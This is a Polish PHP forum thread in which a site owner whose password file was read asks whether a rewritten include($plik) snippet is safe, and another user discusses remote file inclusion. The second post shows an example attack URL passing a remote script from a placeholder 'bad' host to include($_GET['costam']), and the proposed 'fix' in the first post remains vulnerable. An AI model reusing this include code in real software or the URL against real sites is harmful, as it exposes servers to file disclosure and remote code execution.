![]() |
![]() |
![]()
Post
#1
|
|
Grupa: Zarejestrowani Postów: 24 Pomógł: 0 Dołączył: 14.10.2003 Ostrzeżenie: (0%) ![]() ![]() |
Ostatnio dużo czytałem o zabezpieczeniech danych przesyłanych drogą post i get
Nawet w prowadzonym przez mnie serwisie stosując stare techniki ktoś odczytał plik d.php gdzie przechowywane sa hasła i zaproponował mi zmainą poniższego kodu na następujący [php:1:38b804c758]<?php if ((!isset($plik)) || ($plik=="")) { include("aktualnosci.php"); } else { include($plik); } ?>[/php:1:38b804c758] na następujący [php:1:38b804c758]<?php $plik = $HTTP_GET_VARS['plik']; if ($plik||!file_exists($plik)) { include("aktualnosci.php"); } else { include($plik); } ?>[/php:1:38b804c758] Czy to jest poprawne i nie ma zadnego haka i jak bylo to mozliew ze sprawdzili moje hasła ___ [scanner] Zmoderowane. Prosze używac BBCode |
|
|
![]() |
![]()
Post
#2
|
|
Grupa: Zarejestrowani Postów: 560 Pomógł: 0 Dołączył: 15.07.2003 Skąd: Kwidzyn Ostrzeżenie: (0%) ![]() ![]() |
hmm no wlasnie trapi mi pewna sprawa jak kto robi
[php:1:c24b7d2059]<?php include ($_GET['costam']); ?>[/php:1:c24b7d2059] no to mozliwe jest podpiecie skrypty tak?? http://twoja.strona.pl/?costam=http://bad....ode.pl/code.php no ale przeciez skrypt nie zostanie przeslany jako "skrypt" tylko jako wynik dzialania skryptu, tzn chodzi mi o to jezeli plik code.php ma taka zawarosc: [php:1:c24b7d2059]<?php $kiszka='tralala bla bla bla'; echo $kiszka; ?>[/php:1:c24b7d2059] no to podstawienie code.php w includa wstawi tam "tralala bla bla bla" a nie $kiszka='tralala bla bla bla'; echo $kiszka; czy sie myle?? jednym slowem (IMG:http://forum.php.pl/style_emoticons/default/smile.gif) server nie moze wyslac jawnego kodu php tylko jego wynik dzialania chyba ze w pliku code.php uzyje sie jakiegos tajemniczego parsowania czy czegos takiego :| |
|
|
![]() ![]() |
![]() |
Aktualny czas: 6.10.2025 - 14:49 |